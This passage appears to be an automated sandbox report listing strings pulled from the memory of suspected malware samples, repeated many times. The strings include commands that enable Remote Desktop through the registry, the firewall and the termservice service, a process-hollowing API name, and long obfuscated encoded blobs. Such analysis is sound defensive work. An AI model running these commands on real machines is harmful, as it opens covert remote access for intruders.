RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: rapes.exeString found in binary or memory: net start termservice
                                                Source: rapes.exe, 0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: rapes.exe, 0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: rapes.exe, 0000000C.00000002.1440488176.00000000002B1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                                                Source: rapes.exe, 0000000C.00000002.1440488176.00000000002B1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: rapes.exeString found in binary or memory: net start termservice
                                                Source: rapes.exe, 0000000D.00000002.1443417785.00000000002B1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                                                Source: rapes.exe, 0000000D.00000002.1443417785.00000000002B1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: rapes.exe, 0000000D.00000003.1402595713.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: rapes.exe, 0000000D.00000003.1402595713.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: net start termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457033366.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457033366.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000003.1414306794.0000000005090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000003.1414306794.0000000005090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 